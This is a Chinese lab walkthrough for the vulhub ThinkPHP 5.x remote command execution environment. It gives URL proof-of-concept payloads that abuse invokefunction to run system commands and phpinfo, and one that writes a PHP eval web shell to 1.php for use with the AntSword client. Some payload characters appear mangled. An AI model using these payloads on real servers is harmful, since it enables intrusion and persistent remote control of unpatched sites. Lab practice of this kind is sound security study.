Thinkphp5x远程命令执行 靶场攻略

你不要在理我了2024-09-27 17:51

环境配置

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

漏洞复现

1.访问靶场:http://172.16.1.198:8080/

2.远程命令执⾏

POC:

?s=index/think\app/invokefunction&function=call_user_func_array&vars0=system&vars1

\[\]=whoami

3.远程代码执行

POC:

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars0=phpinfo&vars[

1]\[\]=-1

4.写入一句话木马到根目录下的1.php

POC:

?s=index/think\app/invokefunction&function=call_user_func_array&vars0=system&vars1\[\]=echo "<?php @eval(\$_POSTcmd);?>" > 1.php

5.蚁剑连接

相关推荐
玉宇夕落10 小时前
别再死磕 Prompt 了!上下文工程 (Context Engineering) 的简单学习
后端
用户342323237631710 小时前
定时器与 PWM 输出详解
后端
Jason_chen11 小时前
Linux 6.2 CAN/CANFD机制详解
后端
plainGeekDev12 小时前
GreenDAO → Room
android·java·kotlin
Apifox12 小时前
Apifox 6 月更新|Apifox CLI 全面升级、导入导出优化、OAuth 2.0 支持自动刷新令牌
前端·后端·测试
悟空瞎说12 小时前
NestJS 接口设计避坑:摒弃万能用户更新接口,落地单一职责与最小权限原则
后端·nestjs
smallyoung12 小时前
Spring AI 2.0 VectorStore实战:从原理到RAG落地
人工智能·后端
jiayou6412 小时前
KingbaseES 表级与列级加密完全指南
数据库·后端
青丘12 小时前
Spring AI整合Milvus向量数据库实战
后端
热门推荐
012026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?022026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?032026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf04Trae国际版与国内版深度测评:AI原生IDE的双生花05飞书长连接_事件订阅(接收消息,审批任务状态变更)06【AI】2026 年具身智能模型和世界模型总结07Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析08GitHub 镜像站点092026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?102026年AI架构实战:彻底解决OpenAI接口超时与封号,Python调用GPT-5.2/Sora2企业级架构详解(附源码+压测报告)